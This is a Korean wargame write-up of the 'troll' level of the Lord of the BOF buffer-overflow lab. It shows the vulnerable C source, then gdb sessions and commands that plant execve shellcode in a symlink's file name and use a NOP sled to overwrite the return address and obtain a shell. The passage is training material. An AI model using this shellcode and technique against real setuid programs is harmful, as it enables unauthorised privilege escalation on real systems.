   해킹잘하고싶다
   http://없음
   [L.O.B 원정대] - orge

http://www.hackerschool.org/HS_Boards/zboard.php?AllArticle=true&no=8610


[orge@localhost orge]$ ls -al
total 52
drwx------    2 orge     orge         4096 Jul  3 07:00 .
drwxr-xr-x   25 root     root         4096 Mar 30  2010 ..
-rw-------    1 orge     orge           23 Jul  3 07:00 .bash_history
-rw-r--r--    1 orge     orge           24 Feb 27  2010 .bash_logout
-rw-r--r--    1 orge     orge          230 Feb 27  2010 .bash_profile
-rw-r--r--    1 orge     orge          124 Feb 27  2010 .bashrc
-rwxr-xr-x    1 orge     orge          333 Feb 27  2010 .emacs
-rw-r--r--    1 orge     orge         3394 Feb 27  2010 .screenrc
-rwsr-sr-x    1 troll    troll       12693 Mar  1  2010 troll
-rw-r--r--    1 root     root          772 Mar 29  2010 troll.c
[orge@localhost orge]$ clear
[orge@localhost orge]$ bash2
[orge@localhost orge]$ ls -al
total 52
drwx------    2 orge     orge         4096 Jul  3 07:00 .
drwxr-xr-x   25 root     root         4096 Mar 30  2010 ..
-rw-------    1 orge     orge           23 Jul  3 07:00 .bash_history
-rw-r--r--    1 orge     orge           24 Feb 27  2010 .bash_logout
-rw-r--r--    1 orge     orge          230 Feb 27  2010 .bash_profile
-rw-r--r--    1 orge     orge          124 Feb 27  2010 .bashrc
-rwxr-xr-x    1 orge     orge          333 Feb 27  2010 .emacs
-rw-r--r--    1 orge     orge         3394 Feb 27  2010 .screenrc
-rwsr-sr-x    1 troll    troll       12693 Mar  1  2010 troll
-rw-r--r--    1 root     root          772 Mar 29  2010 troll.c
[orge@localhost orge]$ cat troll.c
/*
        The Lord of the BOF : The Fellowship of the BOF
        - troll
        - check argc + argv hunter
*/

#include <stdio.h>
#include <stdlib.h>

extern char **environ;

/*
 * main(argc, argv) - entry point of the "troll" level.
 *
 * Deliberately vulnerable wargame target.  The listing is kept
 * byte-identical to the binary that is disassembled further down the
 * page, so the defects are documented here rather than fixed:
 *   - main has no return type and <string.h> is not included, so
 *     memset/strlen/strcpy are implicitly declared (pre-C99 style);
 *   - argv[1][47] is read before the length of argv[1] is checked,
 *     which is an out-of-bounds read for any shorter argument;
 *   - the length check accepts 48 bytes while buffer holds 40, so the
 *     strcpy below can write up to 9 bytes (48 + NUL) past its end.
 * Only environ and argv[1] are wiped; argv[0] is never touched.
 */
main(int argc, char *argv[])
{
        char buffer[40];        /* lives at ebp-40 (see lea eax,[ebp-40] in the gdb dump) */
        int i;

        // here is changed: exactly one command-line argument is accepted
        if(argc != 2){
                printf("argc must be two!\n");
                exit(0);
        }

        // egghunter: zero every environment string in place so nothing
        // can be staged in the environment
        for(i=0; environ[i]; i++)
                memset(environ[i], 0, strlen(environ[i]));

        // Offset 47 is the last byte of the slot that follows the 40-byte
        // buffer and the 4-byte saved ebp, i.e. the most significant byte
        // of the return address on little-endian x86 (the run below with
        // 44 NOPs + 4 x 0xbf faults at 0xbfbfbfbf).  This read precedes the
        // length check, so a short argv[1] makes it an out-of-bounds read.
        if(argv[1][47] != '\xbf')
        {
                printf("stack is still your friend.\n");
                exit(0);
        }

        // check the length of argument: 48 is allowed although buffer is 40 bytes
        if(strlen(argv[1]) > 48){
                printf("argument is too long!\n");
                exit(0);
        }

        // Unbounded copy of up to 48 bytes + NUL into a 40-byte buffer: the
        // stack overflow this level is built around.  A bounded copy limited
        // to sizeof buffer - 1 would close it.
        strcpy(buffer, argv[1]);
        printf("%s\n", buffer);

        // buffer hunter: wipe the copied argument from the stack frame
        memset(buffer, 0, 40);

        // one more! wipe argv[1] itself (argv[0] is left as is)
        memset(argv[1], 0, strlen(argv[1]));
}









코드를 보아하니 argc 인자값은 2개가 되어야 하고
argv[1]은 마지막에 0으로 초기화된다.
...파일 이름 자체를 페이로드로 만들면?
ㅇㅋ 된다...






[orge@localhost orge]$ mkdir tmp
[orge@localhost orge]$ cp troll tmp
[orge@localhost orge]$ cd tmp
[orge@localhost tmp]$ ls
troll
[orge@localhost tmp]$ ln -s troll `python -c 'print "\x90"*200+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80"'`
ln: cannot create symbolic link `1??h//shh/bin???¡Æ
                                                ?' to `troll': No such file or directory
[orge@localhost tmp]$ ls -al
total 24
drwxrwxr-x    2 orge     orge         4096 Jul  7 04:09 .
drwx------    3 orge     orge         4096 Jul  7 04:09 ..
-rwsr-sr-x    1 orge     orge        12693 Jul  7 04:09 troll
[orge@localhost tmp]$ ln -s ./troll `python -c 'print "\x90"*200+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80"'`
ln: cannot create symbolic link `1??h//shh/bin???¡Æ
                                                ?' to `./troll': No such file or directory
[orge@localhost tmp]$ ls
troll
[orge@localhost tmp]$ ln -s troll `python -c 'print "\x90"*200+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80"'`
ln: cannot create symbolic link `1??h//shh/bin???¡Æ
                                                ?' to `troll': No such file or directory
[orge@localhost tmp]$ ln -s troll `python -c 'print "\x90"*200+"\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81"'`








처음엔 25바이트 쉘코드가 왜 파일 이름에 넣으면 인식이 안 되는지
헤매다가 원인을 찾아냈다.
'\x2f' 값은 슬래시(/)를 의미하는데,
이것은 리눅스에서 파일 위치의 경로 구분자를 의미하기 때문에
파일 이름에는 \x2f 값을 넣지 말아야 되는 것이다.

아래는 \x2f가 없는 쉘코드다.

\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81






[orge@localhost tmp]$ ls    
troll
?????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????1?2?l?y?????—þy2i00tii0cjo??????
[orge@localhost tmp]$ gdb -q `python -c 'print "\x90"*200+"\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81"'`
(gdb) set disassembly intel
(gdb) disas main
Dump of assembler code for function main:
0x8048500 <main>:        push   %ebp
0x8048501 <main+1>:        mov    %ebp,%esp
0x8048503 <main+3>:        sub    %esp,44
0x8048506 <main+6>:        cmp    DWORD PTR [%ebp+8],2
0x804850a <main+10>:        je     0x8048523 <main+35>
0x804850c <main+12>:        push   0x8048690
0x8048511 <main+17>:        call   0x8048410 <printf>
0x8048516 <main+22>:        add    %esp,4
0x8048519 <main+25>:        push   0
0x804851b <main+27>:        call   0x8048420 <exit>
0x8048520 <main+32>:        add    %esp,4
0x8048523 <main+35>:        nop    
0x8048524 <main+36>:        mov    DWORD PTR [%ebp-44],0x0
0x804852b <main+43>:        nop    
0x804852c <main+44>:        lea    %esi,[%esi*1]
0x8048530 <main+48>:        mov    %eax,DWORD PTR [%ebp-44]
0x8048533 <main+51>:        lea    %edx,[%eax*4]
0x804853a <main+58>:        mov    %eax,%ds:0x80497cc
0x804853f <main+63>:        cmp    DWORD PTR [%eax+%edx],0
0x8048543 <main+67>:        jne    0x8048547 <main+71>
0x8048545 <main+69>:        jmp    0x8048587 <main+135>
0x8048547 <main+71>:        mov    %eax,DWORD PTR [%ebp-44]
0x804854a <main+74>:        lea    %edx,[%eax*4]
0x8048551 <main+81>:        mov    %eax,%ds:0x80497cc
0x8048556 <main+86>:        mov    %edx,DWORD PTR [%eax+%edx]
0x8048559 <main+89>:        push   %edx
0x804855a <main+90>:        call   0x80483f0 <strlen>
0x804855f <main+95>:        add    %esp,4
0x8048562 <main+98>:        mov    %eax,%eax
0x8048564 <main+100>:        push   %eax
0x8048565 <main+101>:        push   0
0x8048567 <main+103>:        mov    %eax,DWORD PTR [%ebp-44]
0x804856a <main+106>:        lea    %edx,[%eax*4]
0x8048571 <main+113>:        mov    %eax,%ds:0x80497cc
0x8048576 <main+118>:        mov    %edx,DWORD PTR [%eax+%edx]
0x8048579 <main+121>:        push   %edx
0x804857a <main+122>:        call   0x8048430 <memset>
0x804857f <main+127>:        add    %esp,12
0x8048582 <main+130>:        inc    DWORD PTR [%ebp-44]
0x8048585 <main+133>:        jmp    0x8048530 <main+48>
0x8048587 <main+135>:        mov    %eax,DWORD PTR [%ebp+12]
0x804858a <main+138>:        add    %eax,4
0x804858d <main+141>:        mov    %edx,DWORD PTR [%eax]
0x804858f <main+143>:        add    %edx,47
0x8048592 <main+146>:        cmp    BYTE PTR [%edx],0xbf
0x8048595 <main+149>:        je     0x80485b0 <main+176>
0x8048597 <main+151>:        push   0x80486a3
0x804859c <main+156>:        call   0x8048410 <printf>
0x80485a1 <main+161>:        add    %esp,4
0x80485a4 <main+164>:        push   0
---Type <return> to continue, or q <return> to quit---
0x80485a6 <main+166>:        call   0x8048420 <exit>
0x80485ab <main+171>:        add    %esp,4
0x80485ae <main+174>:        mov    %esi,%esi
0x80485b0 <main+176>:        mov    %eax,DWORD PTR [%ebp+12]
0x80485b3 <main+179>:        add    %eax,4
0x80485b6 <main+182>:        mov    %edx,DWORD PTR [%eax]
0x80485b8 <main+184>:        push   %edx
0x80485b9 <main+185>:        call   0x80483f0 <strlen>
0x80485be <main+190>:        add    %esp,4
0x80485c1 <main+193>:        mov    %eax,%eax
0x80485c3 <main+195>:        cmp    %eax,48
0x80485c6 <main+198>:        jbe    0x80485e0 <main+224>
0x80485c8 <main+200>:        push   0x80486c0
0x80485cd <main+205>:        call   0x8048410 <printf>
0x80485d2 <main+210>:        add    %esp,4
0x80485d5 <main+213>:        push   0
0x80485d7 <main+215>:        call   0x8048420 <exit>
0x80485dc <main+220>:        add    %esp,4
0x80485df <main+223>:        nop    
0x80485e0 <main+224>:        mov    %eax,DWORD PTR [%ebp+12]
0x80485e3 <main+227>:        add    %eax,4
0x80485e6 <main+230>:        mov    %edx,DWORD PTR [%eax]
0x80485e8 <main+232>:        push   %edx
0x80485e9 <main+233>:        lea    %eax,[%ebp-40]
0x80485ec <main+236>:        push   %eax
0x80485ed <main+237>:        call   0x8048440 <strcpy>
0x80485f2 <main+242>:        add    %esp,8
0x80485f5 <main+245>:        lea    %eax,[%ebp-40]
0x80485f8 <main+248>:        push   %eax
0x80485f9 <main+249>:        push   0x80486d7
0x80485fe <main+254>:        call   0x8048410 <printf>
0x8048603 <main+259>:        add    %esp,8
0x8048606 <main+262>:        push   40
0x8048608 <main+264>:        push   0
0x804860a <main+266>:        lea    %eax,[%ebp-40]
0x804860d <main+269>:        push   %eax
0x804860e <main+270>:        call   0x8048430 <memset>
0x8048613 <main+275>:        add    %esp,12
0x8048616 <main+278>:        mov    %eax,DWORD PTR [%ebp+12]
0x8048619 <main+281>:        add    %eax,4
0x804861c <main+284>:        mov    %edx,DWORD PTR [%eax]
0x804861e <main+286>:        push   %edx
0x804861f <main+287>:        call   0x80483f0 <strlen>
0x8048624 <main+292>:        add    %esp,4
0x8048627 <main+295>:        mov    %eax,%eax
0x8048629 <main+297>:        push   %eax
0x804862a <main+298>:        push   0
0x804862c <main+300>:        mov    %eax,DWORD PTR [%ebp+12]
0x804862f <main+303>:        add    %eax,4
0x8048632 <main+306>:        mov    %edx,DWORD PTR [%eax]
0x8048634 <main+308>:        push   %edx
---Type <return> to continue, or q <return> to quit---
0x8048635 <main+309>:        call   0x8048430 <memset>
0x804863a <main+314>:        add    %esp,12
0x804863d <main+317>:        leave  
0x804863e <main+318>:        ret    
0x804863f <main+319>:        nop    
End of assembler dump.
(gdb) r `python -c 'print "\x90"*44+"\xbf"*4'`
Starting program: /home/orge/tmp/?1?2ly???yyy2i00tii0cjo??
                                                            ? `python -c 'print "\x90"*44+"\xbf"*4'`
Xshell¢¯¢¯¢¯¢¯

Program received signal SIGSEGV, Segmentation fault.
0xbfbfbfbf in ?? ()
(gdb) b *main+237                            
Breakpoint 1 at 0x80485ed
(gdb) r `python -c 'print "\x90"*44+"\xbf"*4'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y

Starting program: /home/orge/tmp/?1?2ly???yyy2i00tii0cjo??
                                                            ? `python -c 'print "\x90"*44+"\xbf"*4'`
Xshell
Breakpoint 1, 0x80485ed in main ()
(gdb) x/512x $esp
0xbffff8b4:        0xbffff8c0        0xbffffb35        0x00000017        0xbffff8e8
0xbffff8c4:        0x4000a970        0x400f855b        0x080496fc        0x4000ae60
0xbffff8d4:        0xbffff934        0xbffff8e8        0x080484eb        0x080496e8
0xbffff8e4:        0x080496fc        0xbffff908        0x400309cb        0x00000002
0xbffff8f4:        0xbffff934        0xbffff940        0x40013868        0x00000002
0xbffff904:        0x08048450        0x00000000        0x08048471        0x08048500
0xbffff914:        0x00000002        0xbffff934        0x08048390        0x0804866c
0xbffff924:        0x4000ae60        0xbffff92c        0x40013e90        0x00000002
0xbffff934:        0xbffffa2d        0xbffffb35        0x00000000        0xbffffb66
0xbffff944:        0xbffffb88        0xbffffb92        0xbffffba0        0xbffffbbf
0xbffff954:        0xbffffbcc        0xbffffbe3        0xbffffbfd        0xbffffc1c
0xbffff964:        0xbffffc27        0xbffffc35        0xbffffc75        0xbffffc87
0xbffff974:        0xbffffc97        0xbffffcac        0xbffffcbc        0xbffffcc6
0xbffff984:        0xbffffce2        0xbffffcfa        0xbffffd05        0xbffffd16
0xbffff994:        0xbffffd29        0xbffffd31        0x00000000        0x00000003
0xbffff9a4:        0x08048034        0x00000004        0x00000020        0x00000005
0xbffff9b4:        0x00000006        0x00000006        0x00001000        0x00000007
0xbffff9c4:        0x40000000        0x00000008        0x00000000        0x00000009
0xbffff9d4:        0x08048450        0x0000000b        0x000001fb        0x0000000c
0xbffff9e4:        0x000001fb        0x0000000d        0x000001fb        0x0000000e
0xbffff9f4:        0x000001fb        0x00000010        0x0febfbff        0x0000000f
0xbffffa04:        0xbffffa28        0x00000000        0x00000000        0x00000000
0xbffffa14:        0x00000000        0x00000000        0x00000000        0x00000000
0xbffffa24:        0x00000000        0x36383669        0x6f682f00        0x6f2f656d
0xbffffa34:        0x2f656772        0x2f706d74        0x90909090        0x90909090
0xbffffa44:        0x90909090        0x90909090        0x90909090        0x90909090
0xbffffa54:        0x90909090        0x90909090        0x90909090        0x90909090
0xbffffa64:        0x90909090        0x90909090        0x90909090        0x90909090
0xbffffa74:        0x90909090        0x90909090        0x90909090        0x90909090
0xbffffa84:        0x90909090        0x90909090        0x90909090        0x90909090
0xbffffa94:        0x90909090        0x90909090        0x90909090        0x90909090
0xbffffaa4:        0x90909090        0x90909090        0x90909090        0x90909090
0xbffffab4:        0x90909090        0x90909090        0x90909090        0x90909090
0xbffffac4:        0x90909090        0x90909090        0x90909090        0x90909090
0xbffffad4:        0x90909090        0x90909090        0x90909090        0x90909090
0xbffffae4:        0x90909090        0x90909090        0x90909090        0x90909090
0xbffffaf4:        0x90909090        0x90909090        0x90909090        0x90909090
0xbffffb04:        0x315e11eb        0x8032b1c9        0x01ff0e6c        0x7501e980
0xbffffb14:        0xe805ebf6        0xffffffea        0x6951c132        0x69743030
0xbffffb24:        0x6a633069        0x51e48a6f        0x9ae28a54        0x81ce0cb1
0xbffffb34:        0x90909000        0x90909090        0x90909090        0x90909090
0xbffffb44:        0x90909090        0x90909090        0x90909090        0x90909090
0xbffffb54:        0x90909090        0x90909090        0x90909090        0xbfbfbf90
0xbffffb64:        0x000000bf        0x00000000        0x00000000        0x00000000
0xbffffb74:        0x00000000        0x00000000        0x00000000        0x00000000
0xbffffb84:        0x00000000        0x00000000        0x00000000        0x00000000
0xbffffb94:        0x00000000        0x00000000        0x00000000        0x00000000
0xbffffba4:        0x00000000        0x00000000        0x00000000        0x00000000
0xbffffbb4:        0x00000000        0x00000000        0x00000000        0x00000000
0xbffffbc4:        0x00000000        0x00000000        0x00000000        0x00000000
0xbffffbd4:        0x00000000        0x00000000        0x00000000        0x00000000
---Type <return> to continue, or q <return> to quit---
0xbffffbe4:        0x00000000        0x00000000        0x00000000        0x00000000
0xbffffbf4:        0x00000000        0x00000000        0x00000000        0x00000000
0xbffffc04:        0x00000000        0x00000000        0x00000000        0x00000000
0xbffffc14:        0x00000000        0x00000000        0x00000000        0x00000000
0xbffffc24:        0x00000000        0x00000000        0x00000000        0x00000000
0xbffffc34:        0x00000000        0x00000000        0x00000000        0x00000000
0xbffffc44:        0x00000000        0x00000000        0x00000000        0x00000000
0xbffffc54:        0x00000000        0x00000000        0x00000000        0x00000000
0xbffffc64:        0x00000000        0x00000000        0x00000000        0x00000000
0xbffffc74:        0x00000000        0x00000000        0x00000000        0x00000000
0xbffffc84:        0x00000000        0x00000000        0x00000000        0x00000000
0xbffffc94:        0x00000000        0x00000000        0x00000000        0x00000000
0xbffffca4:        0x00000000        0x00000000        0x00000000        0x00000000
0xbffffcb4:        0x00000000        0x00000000        0x00000000        0x00000000
0xbffffcc4:        0x00000000        0x00000000        0x00000000        0x00000000
0xbffffcd4:        0x00000000        0x00000000        0x00000000        0x00000000
0xbffffce4:        0x00000000        0x00000000        0x00000000        0x00000000
0xbffffcf4:        0x00000000        0x00000000        0x00000000        0x00000000
0xbffffd04:        0x00000000        0x00000000        0x00000000        0x00000000
0xbffffd14:        0x00000000        0x00000000        0x00000000        0x00000000
0xbffffd24:        0x00000000        0x00000000        0x00000000        0x00000000
0xbffffd34:        0x00000000        0x00000000        0x00000000        0x00000000
0xbffffd44:        0x00000000        0x00000000        0x00000000        0x00000000
0xbffffd54:        0x00000000        0x00000000        0x00000000        0x00000000
0xbffffd64:        0x00000000        0x00000000        0x00000000        0x00000000
0xbffffd74:        0x00000000        0x00000000        0x00000000        0x00000000
0xbffffd84:        0x00000000        0x00000000        0x00000000        0x00000000
0xbffffd94:        0x00000000        0x00000000        0x00000000        0x00000000
0xbffffda4:        0x00000000        0x00000000        0x00000000        0x00000000
0xbffffdb4:        0x00000000        0x00000000        0x00000000        0x00000000
0xbffffdc4:        0x00000000        0x00000000        0x00000000        0x00000000
0xbffffdd4:        0x00000000        0x00000000        0x00000000        0x00000000
0xbffffde4:        0x00000000        0x00000000        0x00000000        0x00000000
0xbffffdf4:        0x00000000        0x00000000        0x00000000        0x00000000
0xbffffe04:        0x00000000        0x00000000        0x00000000        0x00000000
0xbffffe14:        0x00000000        0x00000000        0x00000000        0x00000000
0xbffffe24:        0x00000000        0x00000000        0x00000000        0x00000000
0xbffffe34:        0x00000000        0x00000000        0x00000000        0x00000000
0xbffffe44:        0x00000000        0x00000000        0x00000000        0x00000000
0xbffffe54:        0x00000000        0x00000000        0x00000000        0x00000000
0xbffffe64:        0x00000000        0x00000000        0x00000000        0x00000000
0xbffffe74:        0x00000000        0x00000000        0x00000000        0x00000000
0xbffffe84:        0x00000000        0x00000000        0x00000000        0x00000000
0xbffffe94:        0x00000000        0x00000000        0x00000000        0x00000000
0xbffffea4:        0x00000000        0x00000000        0x00000000        0x00000000
0xbffffeb4:        0x00000000        0x00000000        0x00000000        0x00000000
0xbffffec4:        0x00000000        0x00000000        0x00000000        0x00000000
0xbffffed4:        0x00000000        0x00000000        0x00000000        0x00000000
0xbffffee4:        0x00000000        0x00000000        0x00000000        0x00000000
0xbffffef4:        0x6d6f682f        0x726f2f65        0x742f6567        0x902f706d
0xbfffff04:        0x90909090        0x90909090        0x90909090        0x90909090
---Type <return> to continue, or q <return> to quit---
0xbfffff14:        0x90909090        0x90909090        0x90909090        0x90909090
0xbfffff24:        0x90909090        0x90909090        0x90909090        0x90909090
0xbfffff34:        0x90909090        0x90909090        0x90909090        0x90909090
0xbfffff44:        0x90909090        0x90909090        0x90909090        0x90909090
0xbfffff54:        0x90909090        0x90909090        0x90909090        0x90909090
0xbfffff64:        0x90909090        0x90909090        0x90909090        0x90909090
0xbfffff74:        0x90909090        0x90909090        0x90909090        0x90909090
0xbfffff84:        0x90909090        0x90909090        0x90909090        0x90909090
0xbfffff94:        0x90909090        0x90909090        0x90909090        0x90909090
0xbfffffa4:        0x90909090        0x90909090        0x90909090        0x90909090
0xbfffffb4:        0x90909090        0x90909090        0x90909090        0x90909090
0xbfffffc4:        0x90909090        0xeb909090        0xc9315e11        0x6c8032b1
0xbfffffd4:        0x8001ff0e        0xf67501e9        0xeae805eb        0x32ffffff
0xbfffffe4:        0x306951c1        0x69697430        0x6f6a6330        0x5451e48a
0xbffffff4:        0xb19ae28a        0x0081ce0c        0x00000000        Cannot access memory at address 0xc0000000
(gdb) q
The program is running.  Exit anyway? (y or n) y
[orge@localhost tmp]$ cd ..
[orge@localhost orge]$ ls
tmp  troll  troll.c
[orge@localhost orge]$ ln -s troll `python -c 'print "\x90"*200+"\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81"'`
[orge@localhost orge]$ ./`python -c 'print "\x90"*200+"\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81"' `python -c 'print "\x90"*44+"\xa4\xff\xff\xbf"'`
>
[orge@localhost orge]$ ./`python -c 'print "\x90"*200+"\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81"' `python -c 'print "\x90"*44+"\xa4\xff\xff\xbf"'`
>
[orge@localhost orge]$ ./`python -c 'print "\x90"*200+"\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81"' `python -c 'print "\x90"*44+"\xa4\xff\xff\xbf"'`
> my-pass
>
[orge@localhost orge]$ ./`python -c 'print "\x90"*200+"\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81"'` `python -c 'print "\x90"*44+"\xa4\xff\xff\xbf"'`
my-pass
¢´yy¢¯
Segmentation fault
euid = 507
[?????????????]
[orge@localhost orge]$ ./`python -c 'print "\x90"*200+"\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81"'` `python -c 'print "\x90"*44+"\xa4\xff\xff\xbf"'`
¢´yy¢¯
Segmentation fault





두 번째 고비가 왔다...
필자는 혹시나 파일 이름(쉘코드) 뒤에 \x90(nop)이 없어서
그런가 유추했고, 그 유추가 맞아떨어졌다.






NOP Sled란 무엇일까?
"NOP 명령어(아무것도 안 하는 명령어)를 미끄럼틀처럼 쭉 깔아두고,
그 위에 shellcode를 배치해, return address가 정확히 맞지 않아도
shellcode까지 미끄러지듯 도달하게 만드는 기법"

구조적 개념은...
버퍼 오버플로우 exploit은 대체로 이런 구조를 가지게 된다.

[ NOP SLED ][ Shellcode ][ Padding ][ Return Address ]




근데 실제로는 이렇게 메모리에 쌓인다.


|--------------------------|
|   NOP sled (ex. \x90)   |
|--------------------------|
|     Shellcode           |
|--------------------------|
|     Saved EBP           |
|--------------------------|
|   Return Address (EIP)  |
|--------------------------|


nop의 목적은...
EIP(Return Address)를 정확히 shellcode 위치에 맞추는 건 어렵다.
그래서 그 "근처" 어딘가에만 점프해도 성공시키려고,
shellcode 앞에 NOP를 잔뜩 깔아두는 것이다.
EIP가 NOP 안 어딘가로 떨어지면
NOP가 연달아 실행되면서 결국 shellcode에 도달하게 된다.





[orge@localhost orge]$ ln -s troll `python -c 'print "\x90"*200+"\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81"+"\x90"*30'`
ln: ?1?2ly???yyy2i00tii0cjo??
                               ?: File name too long
[orge@localhost orge]$ cd tmp
[orge@localhost tmp]$ ls
troll
?????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????1?2?l?y?????—þy2i00tii0cjo??????
[orge@localhost tmp]$ ln -s troll `python -c 'print "\x90"*100+"\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81"+"\x90"*100'`
[orge@localhost tmp]$ gdb -q ./`python -c 'print "\x90"*100+"\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81"+"\x90"*100'`
(gdb) set disassembly inte
(gdb) set disassembly intel
(gdb) disas main
Dump of assembler code for function main:
0x8048500 <main>:        push   %ebp
0x8048501 <main+1>:        mov    %ebp,%esp
0x8048503 <main+3>:        sub    %esp,44
0x8048506 <main+6>:        cmp    DWORD PTR [%ebp+8],2
0x804850a <main+10>:        je     0x8048523 <main+35>
0x804850c <main+12>:        push   0x8048690
0x8048511 <main+17>:        call   0x8048410 <printf>
0x8048516 <main+22>:        add    %esp,4
0x8048519 <main+25>:        push   0
0x804851b <main+27>:        call   0x8048420 <exit>
0x8048520 <main+32>:        add    %esp,4
0x8048523 <main+35>:        nop    
0x8048524 <main+36>:        mov    DWORD PTR [%ebp-44],0x0
0x804852b <main+43>:        nop    
0x804852c <main+44>:        lea    %esi,[%esi*1]
0x8048530 <main+48>:        mov    %eax,DWORD PTR [%ebp-44]
0x8048533 <main+51>:        lea    %edx,[%eax*4]
0x804853a <main+58>:        mov    %eax,%ds:0x80497cc
0x804853f <main+63>:        cmp    DWORD PTR [%eax+%edx],0
0x8048543 <main+67>:        jne    0x8048547 <main+71>
0x8048545 <main+69>:        jmp    0x8048587 <main+135>
0x8048547 <main+71>:        mov    %eax,DWORD PTR [%ebp-44]
0x804854a <main+74>:        lea    %edx,[%eax*4]
0x8048551 <main+81>:        mov    %eax,%ds:0x80497cc
0x8048556 <main+86>:        mov    %edx,DWORD PTR [%eax+%edx]
0x8048559 <main+89>:        push   %edx
0x804855a <main+90>:        call   0x80483f0 <strlen>
0x804855f <main+95>:        add    %esp,4
0x8048562 <main+98>:        mov    %eax,%eax
0x8048564 <main+100>:        push   %eax
0x8048565 <main+101>:        push   0
0x8048567 <main+103>:        mov    %eax,DWORD PTR [%ebp-44]
0x804856a <main+106>:        lea    %edx,[%eax*4]
0x8048571 <main+113>:        mov    %eax,%ds:0x80497cc
0x8048576 <main+118>:        mov    %edx,DWORD PTR [%eax+%edx]
0x8048579 <main+121>:        push   %edx
0x804857a <main+122>:        call   0x8048430 <memset>
0x804857f <main+127>:        add    %esp,12
0x8048582 <main+130>:        inc    DWORD PTR [%ebp-44]
0x8048585 <main+133>:        jmp    0x8048530 <main+48>
0x8048587 <main+135>:        mov    %eax,DWORD PTR [%ebp+12]
0x804858a <main+138>:        add    %eax,4
0x804858d <main+141>:        mov    %edx,DWORD PTR [%eax]
0x804858f <main+143>:        add    %edx,47
0x8048592 <main+146>:        cmp    BYTE PTR [%edx],0xbf
0x8048595 <main+149>:        je     0x80485b0 <main+176>
0x8048597 <main+151>:        push   0x80486a3
0x804859c <main+156>:        call   0x8048410 <printf>
0x80485a1 <main+161>:        add    %esp,4
0x80485a4 <main+164>:        push   0
---Type <return> to continue, or q <return> to quit---
0x80485a6 <main+166>:        call   0x8048420 <exit>
0x80485ab <main+171>:        add    %esp,4
0x80485ae <main+174>:        mov    %esi,%esi
